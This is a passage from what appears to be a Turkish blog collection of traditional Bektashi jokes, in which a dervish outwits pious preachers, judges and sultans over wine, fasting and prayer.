Aynı soruyu, orada bulunan Bektaşiye sorunca, hiç istifini bozmadan yanıt vermiş :
-Bu arkadaş benden bir gün fazla tutmuş!



BİTSİN BU DAVA
Bektaşi'nin birine konuk gelecekmiş. Bektasi konuğu nasıl ağırlar..Elde yok, ayakta yok.. Mahçup olmak da istemiyor...Komşusu Yahudi'nin bir sürü keçisi varmış...Onlardan birini çaktırmadan alıp kesiyor...Ama çaktırmadığını sanan kendisi...Yahudi, ağacın arkasından gözlermiş durumu...Diyor ki kendi kendine, "Kadıya gitsem.. Kadı Müslüman, o Müslüman, ben Yahudi.. Davayı kazanamam. Hadi kazandim, Bektaşi'nin nesi var ki, ondan alıp bana versin...Biz artık Allah'ın huzurunda hesaplaşırız...Yillar geçiyor.Yahudi, Allah'ın huzurunda davacı oluyor, Bektaşi'den... Mahkeme kuruluyor..
Allah :
-Sen Yahudi kulumun keçisini kesmişsin, diyor Bektasi'ye...
-Kesmedim, diyor Bektaşi...
-Ben gözlerimle gördum diyor, Yahudi..
-Allahim, diyor Bektaşi... Bir mahkemede bir adam hem şahit, hem davacı olamaz.
-Haklısın ama, diyor, Allah Ben her şeyi görürüm. Ben de gördüm, kestiğini...
-Allahım, diyor Bektaşi...Aynı mahkemede, hem şahit, hem hakim olunmaz...
-Gene haklısın, diyor Allah... O zaman getirin keçiyi ona soralım...
-Ne!... diyor Bektaşi... Keçi burada mı?...Ver onu o zaman bu Yahudi'ye...Bitsin bu dava..



DAMIZLIK BEKTAŞİ
İkinci Mahmut, Yeniçeri ocağını kaldırdıktan sonra, Alevi-Bektaşi kesimi üzerinde terör estirmiş, kimilerini öldürmüş, kimilerini ise sürdürmüştü.İstanbul'da hiçbir Bektaşi ortaya çıkamaz olmuştu.Padişah bir gün Bahçekapı'dan geçerken korkmadan, göğsünü gere gere dolaşan bir Bektaşi babası görküş.Adamın rahat tavırları padişahı etkilemiş.Çağırtılmasını buyurmuş.Baba gelince şöyle demiş :
-Sizinkilerin tümü bir kıyıya kaçtı, gizlendi.Sen burada yalnız başına ne dolaşıyorsun?
Baba çekinmeden yanıtlamış :
-Sultanım, onlar gitti, beni damızlık bıraktılar!



DOMUZUN SOFTASI
Bir Ramazan günü köyün mescidine bir yaban domuzu dadandığını haber vermişler.
Bektaşi hayret içinde sakalını sıvazlayarak :
-Garip şey...Softanın domuzunu çok görmüştüm, ama domuzun softasını ilk defa işitiyorum, demiş.



DÜNYAYA GÖMLEK YIKAMAYA MI GELDİK?
Şeker bayramında herkes yeni ve temiz elbiselerini giyip, birbirleriyle bayramlaştıkları gün, bir fakir Bektaşi dedesi, üstü başı pis halde Beyazid Cami'nin önünden geçerken, bembeyaz sarığı, tertemiz cübbe ve latası ile bir hoca karşısına çıkıp :
-Be adam, mübarek bayram günü bu pis gömlekle dolaşılır mı?Gömleğini yıka! deyince Bektaşi aldırmayarak :
-Be hocam, yıkayayım ama kirlenir, demiş.
Hoca :
-Yine yıka, demiş.
Bektaşi :
-Yine de kirlenir, diye diretmiş.
Hoca inatla :
-Yine yıka, deyince Bektaşi'nin tepesi atmış ve şu cevabı vermiş :
-Behey imanım.Biz bu dünyaya gömlek yıkamaya mı geldik? demiş.



EŞEKLİĞİNDEN
Dostlarının baskılarıına dayanamayan Baba Erenler, camiye gitmiş, hocanın vaazını dinliyordu.Hoca, içkinin kötülüğünü anlatmak için aklına ne geliyorsa söylüyordu.Bir ara şöyle dedi :
-Bir eşeğin önüne, bir kova su ile bir kova şarap koysanız, hangisin içer?Elbette ki su içer.Peki eşek niçin şarabı içmez?
Bektaşi dayanamayıp seslendi :
-Neden olacak, eşekliğinden...



HAK
Nasıl ayin yaptıklarını soran bir Bektaşi'ye Mevlevi :
-Hak, deyip döneriz!, demiş.
Bektaşi su cevabı vermiş :
-Yok azizim, biz Hak denilince dururuz!



HAMURUMUZ TOPRAKLA YOĞRULMUŞ
Softaların arasına düşen Bektaşi'yi neredeyse zorla camiye sokmuşlar.
Herkes abdesini almış.Namaza durmuşlar.Softalardan birisi Bektaşi'ye çıkışmış :
-Erenler, abdest almadınız!
Bektaşinin yanıtı şöyledir :
-İmanım, bizim hamurumuz toprakla yoğrulmuştur, pek su ile oynamaya gelmez.



HANGİ PEZEVENGİ KULLANDI?
Bir Bektaşi, her ne olursa "Allahtan" dermiş.Bir gün külhanbeyin biri, bu Bektaşinin ensesine sultani bir sille aşketmiş.Bektaşi arkasına dönünce külhanbeyi ;
-Baba efendi, ne bakıyorsun, Allah'tan, demiş.
Bektaşi hiç düşünmeden şöyle seslenmiş :
-Doğru be imanım!Ben de Allah'tan olduğunu biliyorum ama, hangi pezevengin eliyle yaptırdığını merak ettim de, ona bakıyorum.



HARAM
Bektaşinin birini ramazanda içki içtiği için yakapaca kadıya götürürler.Çakırkeyif Bektaşi'yi görür görmez kadı :
-Behey kafir!Bu yaşta hala içiyorsun bu zıkkımı.Utanmıyor musun? Bilmiyor musun haram olduğunu?, der.
-Sırtınızdaki ipek kaftan da haramdır, diye karşılık verir Bektaşi.
Kadı :
-Bunun içine pamuk katarlar.
Bektaşi :
-Dünyada doğru adam mı kaldı, şaraba da yarı yarıya su katıyorlar...

İŞİMİZ İŞ
Hocanın biri Ramazanda ;
-Ey ümmeti Muhammed!Şarap içmek kesinlikle haramdır.Sakın içmeyiniz!İçenlerin boyunlarına yarın ahirette, içtikleri şarap şişeleri asılarak, mahşer halkına haftalarca teşhir edileceklerdir, diye vaaz veriyormuş.
Dinleyenlerin arasında bulunan Bektaşi sormuş :
-Hoca efendi!Şişeler dolu mu asılacak, boş mu?
Hoca "Boş" dese, cezanın hafifleyeceğini düşünerek :
-Hayır! Hiç boş olur mu? Dolu olacak, demiş.
Bektaşi, gülerek şöyle bağırmış :
-Desene hocam!Cennette de ya hey!



İYİ DEĞİLİM!
Bektaşi'ye sormuşlar :
-Nasılsın?
-Şükür edecek kadar iyi değilim! demiş...



İYİ RÜYALAR
Mevlevi, Bektaşi ve Softa yemekten sonra ikram edilen bir tepsi baklava için rüyaya yatarlar.En hayırlı düşü gören baklavayı alacak. Öneri kabul edilir. Yatar, uyurlar. Sabah olunca Sofu :
-Ne düş gördünüz anlatın bakalım?, der.
Mevlevi sikkesini başına geçirerek :
-Hayırdır inşallah göklere çıktım, der.
Hoca da :
-Ben ise düşümde cennete gittim, der.
Bektaşi :
-Erenler, ben de gece birinizin göklere uçtuğunu, diğerinizin de cennette gezdiğini görünce, artık bunlar fani dünyaya dönmezler diyerek kalkıp baklavayı temizledim!, der.



KABAHAT SENDE DEĞİL!
Bir köyde yağmur duasına çıkarlar.Bektaşi de istemeye istemeye bunlara uyar, cemaatin arkası sıra giderken, eline geçirdiği bir ağaç dalını, kendi tarlasının bir köşesine saplayarak, başını yukarı kaldırıp, söylenir :
-Bizim tarla da işte burası...
Rastlantı bu ya, yağmur duası yapılır yapılmaz, bulutlar kendini gösterir.
Kara bir bulutun kendi tarlası üzerine gittiğini gören Bektaşi sevinçle koşar.Bir de ne görsün, ceviz büyüklüğünde dolu, bütün ürünü berbat etmemiş mi?O vakit başını yukarı kaldırır; şöyle söyler ;
-Kabahat sende değil, sana tarlayı gösteren pezevenkte!...



KENDİNDE OLMAYANI
Bektaşi, camide namazdan sonra dua etmiş :
-Ey ulu Tanrım, bana bir rakı parası ver!
Yanında namazını bitiren softa da, ellerini kaldırmış :
-Rabbim, bana iman ver!
İki duayı da işiten hoca, Bektaşiye :
-Bak, herkes ne isitiyor Tanrı'dan, sen rakı parası. Utanmıyor musun?, demiş.
Bektaşi usulca :
-Ne yapalım hoca efendi, herkes kendisinde olmayanı ister, demiş.



NASIL BECERDİN
Bektaşi, evinde misafir olduğu için, karpuzcuya uğramış :
-İyi karpuzun var mı?
-Kurabiye gibi baba, güven bana!
-Peki öyleyse iyi bir tane ver bakalım.
Karpuzcu birini seçip vermiş.Baba erenler, almış ve eve gitmiş.
Bektaşi, yemekten sonra, konuklarının önünde karpuza gururla bıçağı vurmuş.Fakat o ne?İlk bıçak darbesinden sonra etrafı koku salmış.Karpuz ikiye ayrılınca, foş diye çürüyen içi masaya yayılmış.Tabii her taraf berbat, Bektaşi ise mahçup olmuş.
Baba, sabahı zor etmiş ve soluğu karpuzcuda almış :
-Erenler, seni tebrik ederim?
Karpuzcu şaşırmış :
-Hayrola baba, beni niye tebrik ediyorsun?
Bektaşi :
-Ulan kesmeden, delmeden o karpuzun içine nasıl sıçtın, doğrusu şaşıp kaldım.Seni onun için tebrik ediyorum.



NE DÜŞÜNÜYORMUŞ?
Bir Bektaşi, merkebine odun yükleyip şehre gelirken karşıdan tüccar kılıklı iki adam peyda olarak :
-Şu zındıkla alay edelim, diye Bektaşiye yanaşıp selam verince Bektaşi de durur, merkebi de.
Tüccarlar işaretle :
-Bu eşeğin ne düşünüyor?
-Odun tasımaktan yorgun düştü de, artık kasabada ticaret etmeyi düsünüyor!



NERESİ OLACAK MEYHANE
Bektaşiyi, rica minnet camiye götürmüşler.Hoca başlamış anlatmaya :
-Bir yer vardır ki orada, zengin fakir ayrımı yoktur.Dertli giren neşeli olur.Oraya giren herkesin gönlü ferahtır.Bilin bakalım, burası neresidir?
Bektaşi yanıt vermiş :
-Neresi olacak, meyhane...



ORUÇ GİTTİ AMA...
Oruç tutan Bektaşinin biri pek fena susamış.Vakit geçirmek için kırda giderken bakmış gürül gürül akan bir çeşme...Adeta kendinden geçmiş bir halde ağzını dayayıp lıkır lıkır içmeye başlamış.Bu sırada oradan geçen biri görüp :
-Aman erenler ne yaptın?Oruç gitti, diye seslenmiş.
Bektaşi, ağzının iki yanından süzülen sular bağrına doğru inerken cevap vermiş :
-Oruç gitti, ama fakire de can geldi!



PEŞİN NAMAZ
Bektaşi ile bir hoca birlikte yola çıkmışlar, bir süre sonra hoca :
-Namaz saati! demiş, başlamış kılmaya...
Rekat üstüne rekat, selam üstüne selam...
Bektaşinin beklemekten canı sıkılmış, hoca namazı bitirince sormuş :
-Yahu bu ne uzun namaz böyle?
-Kazaya kalmış namazlarım vardı, onları eda eyledim!
Bektaşi :
-Eh ben de bir namaz kılayım! demiş ve başlamış namaza...
Ama ne namaz, bitmiyor, sonunda hoca dayanamamış :
-Erenler, senin namaz da uzun sürdü!
-Önümüzdeki haftanın namazını kıldım!
Hoca şaşırmış :
-Yahu olur mu böyle şey?
Bektaşi gülmüş :
-Yukarıdaki senin veresiyeni kabul ediyor da, benim peşinimi niye kabul etmesin?



RAKI
-Rakı helal midir, haram mı? diye sorulunca, Bektaşi şöyle yanıt vermiş :
-Ağıza göre değişir!



SON NEFESİNİ
Bektaşiye sormuşlar :
-Babaerenler, hangi nefesi seversin?
-Sigaranın ilk nefesiyle, kaynanamın son nefesini, demiş....



SENİNKİ PAMUK GİBİ
Paşanın biri, tanıdığı bir Bektaşi ile konuşurken sorar :
-Baba, geçen gün bir kadınla gidiyordun, kimdi o?
-Hanımım olurlar efendim...
-Peki ama, pek pasaklı ve çirkin biriydi.Onun koynuna nasıl giriyorsun?
Buna fena halde bozulan Bektaşi, lafı yapıştırır :
-Sizin pamuk gibi karınızın koynuna herkes girer.Marifet bizim o pasaklı karının koynuna girmekte, paşam!



SENİN MELEĞİN BENİM GİBİ OLUR
Softa, namazını bitirmiş, selam vererken, komşusu olan ve onu yaptığı kötülüklerden iyi tanıyan, Bektaşi yanına iyice sokulup, "Aleykümselam" demiş.Softanın canı fena halde sıkılmış :
-Be adam! Sen de nereden çıktın? Namazımı berbat ettin.
-Selam verdin, ben de aldım.
-Yahu ben sana değil, meleklere selam verdim.
-Erenler, ben de meleğim.
-Ulan defol git şuradan!...Senden melek mi olur?
-Kızma birader!...Senin gibi Müslümanın benim gibi meleği olur...

ŞEYTANA UYMUŞ
Canlardan biri, mahkeme reisliği yapıyordu.Bir gün, genç bir kıza tecavüz suçlamasıyla, orta yaşlı birini mahkemeye getirdiler.
Hakim Bektaşi sordu :
-Ne diye bu haltı işledin?
Adam yanıt verdi :
-Benim kabahatim yok.Şeytana uydum!Kafama girdi ve o işi yapmama sebep oldu.
Bektaşi yargıç, biraz düşündükten sonra şöyle dedi :
-Behey açıkgöz!Hazret-i Adem'e secde etmemek için, cennetten kovulmayı göze alan şeytanın işi yok da, sana pezevenklik mi yapacak?



ŞİŞEYİ ATTIM
Hoca, camide içkinin kötülüğünden bahsediyormuş.Cemaat arasında bulunan Bektaşinin fena halde canı sıkılmış.Gitmek üzere kalkayım derken, koynundaki şarap şişesi kayıp yere düşmüş.Baba hiç istifini bozmadan şöyle konuşmuş :
-Kör olasıcayı işte kaldırıp attım.Sizde varsa, tam zamanı, siz de atın!



UĞURSUZLUK
Avcı Sultan Mehmet bir gün adamlarıyla beraber akşama kadar bir keklik bile vuramaz. Bunun sebebini de, sabahleyin gördüğü bir dervişin uğursuzluğuna bağlar.Solaklara seslenir.Saraydan cıkarken, şu şu tipte, sivri külahlı, sırtı kambur birinin önünden geçtiğini ve hemen bu adamı bulmaları emrini verir. Tarife göre Bektaşi babalarından ayyaş Hamza Babayı yaka paça huzura getirirler.
Sultan :
-Bre uğursuz, nabekar!... Bugün sabahleyin karşıma çıktın. Bu yüzden akşama kadar bir ava rastlayamadım. Bu ne uğursuzluktur.Vurun kellesini...
Bektaşi bakar ki kelle elden gidiyor. Son bir dileğini açıklamak için söz alır :
-A devletlum siz beni gördünüz bir keklik vuramadınız. Ama insaf ediniz, benim de bugün ilk gördüğüm sizdiniz ve kellemi kaybediyorum.Söyleyin, uğursuzluk hangimizde!...



ÜZÜM SUYU
Sultan Abdülmecid bir gün Boğaziçi'nde büyük bir bağın tam ortasındaki köşkünde oturan bir Bektaşi babasını ziyarete gitmiş. Bektaşi, o gün komşu bağdaki bir arkadasını ziyarete gitmiş.O dönünceye kadar padişah bağın hertarafını dolaşmış. Bektaşi dönünce karşılıklı konusmaya baslamislar.
-Erenler bağın maşallah çok büyük.Üzümünü ne yapıyorsun?
-Müritlerle ve canlarla birlikte yeriz Sultanım.
-Buradaki üzüm yemekle biter mi?
-Yemediğimizi de sıkıp fıçılara basar, suyunu içeriz.
-Peki ama, sıkılmış üzüm şarap olmaz mı?
-Vallahi Sultanım, biz üzümü sıkıp fıçılara basarız. Allah ne isterse o olur. Üst tarafina karışmak haddimize mi?



VIZIR VIZIR
Softalar, Bektaşi'ye, Tanrı'nin büyüklüğünü öğretmeye calışıp duruyorlar.Anlatıp, anlatıp, sonunda da diyorlar ki :
-Tanri isterse iğne deliğinden deve bile geçirir!
Bektaşi :
-Elbette, diyor.
-Nasıl elbette?, diyor softalar. Bektaşi çözüyor düğümü :
-Tabii ya! Onun yapamayacağı şey mi var? Canı ister, iğne deliğini büyütür veya canı ister, develeri küçültür, vızır vızır geçirir.



VURMA ZAVALLIYA O HAYVANDIR
Başıboş bir eşek nasılsa bir camiye girmiş, hoca eşeği döverek dışarıya çıkarmaya uğraşırken, oradan geçen bir Bektaşi babası bu hali görerek hocaya sormuş :
-Eşeği niçin dövüyorsun be hoca efendi?
Hoca hışımla cevap vermiş :
-Gelmiş camiye girmiş.
Bektaşi teskin etmek için şöyle demiş :
-Canım hoca efendi, onun aklı erer mi?Hayvan olduğu için yapmış bir yanlışlık, girmiş camiye, bak ben giriyormuyum hiç?..



YUKARDAKİ İLE ARAMIZ AÇIKTA
Bektaşinin yolu bir köye düşmüş. Bakmiş ki ortalıkta hiç erkek yok. Köylü kadınlara sormuş :
-Köydeki erkekler nereye gitti?
-Yagmur duasina gittiler. 15 keredir gidiyorlar hala yağmur yağmadı, demiş kadınlar.
Bu arada Bektaşi, gömleğini ırmak kenarında yıkamış ve bir dala asmış. İste tam bu sırada gök gürleyip şimşek çakınca Bektasi, kadınlara dönüp :
-Bu aralar yukaridakiyle aramız açık da, demiş.

0 yorum  

Kaydol: Kayıtlar (Atom)